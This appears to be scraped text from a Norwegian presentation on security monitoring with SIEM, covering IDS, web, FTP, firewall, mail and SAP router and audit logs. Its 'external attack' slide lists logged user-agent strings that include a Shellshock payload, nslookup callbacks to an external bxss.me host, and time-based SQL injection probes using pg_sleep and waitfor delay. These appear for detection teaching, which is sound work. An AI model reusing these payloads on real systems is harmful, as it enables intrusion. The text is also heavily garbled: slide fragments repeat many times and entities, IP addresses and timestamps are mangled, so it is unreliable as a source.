Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Ulike datakilder
IDS - Intrusion Detection System Suricata Snort Fail2ban
Web Apache NGINX IIS
FTP vsftpd sftp
Brannmur IPtables packetfilter Cisco ASA FortiGate
Epost Qmail postfix
SAP
IDS
Suricata - multitraringdet IDS
Regler paring protokoll
HTTP normalizer og parser
Overvaringkning opp til L7 OSI
Output JSON direkte
Web
Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen
Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul
Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip
Fil via SSL og SSH
Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner
Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes
Angrepsvektor reduseres med enkle midler som feks fail2ban
Distribuerte bruteforce sees relativt enkelt med SIEM
Geoip og plassering paring kart lar oss obeservere unormale hotspots
forsoslashk paring injections
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
IDS
Suricata - multitraringdet IDS
Regler paring protokoll
HTTP normalizer og parser
Overvaringkning opp til L7 OSI
Output JSON direkte
Web
Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen
Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul
Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip
Fil via SSL og SSH
Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner
Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes
Angrepsvektor reduseres med enkle midler som feks fail2ban
Distribuerte bruteforce sees relativt enkelt med SIEM
Geoip og plassering paring kart lar oss obeservere unormale hotspots
forsoslashk paring injections
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Web
Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen
Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul
Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip
Fil via SSL og SSH
Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner
Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes
Angrepsvektor reduseres med enkle midler som feks fail2ban
Distribuerte bruteforce sees relativt enkelt med SIEM
Geoip og plassering paring kart lar oss obeservere unormale hotspots
forsoslashk paring injections
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Fil via SSL og SSH
Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner
Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes
Angrepsvektor reduseres med enkle midler som feks fail2ban
Distribuerte bruteforce sees relativt enkelt med SIEM
Geoip og plassering paring kart lar oss obeservere unormale hotspots
forsoslashk paring injections
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
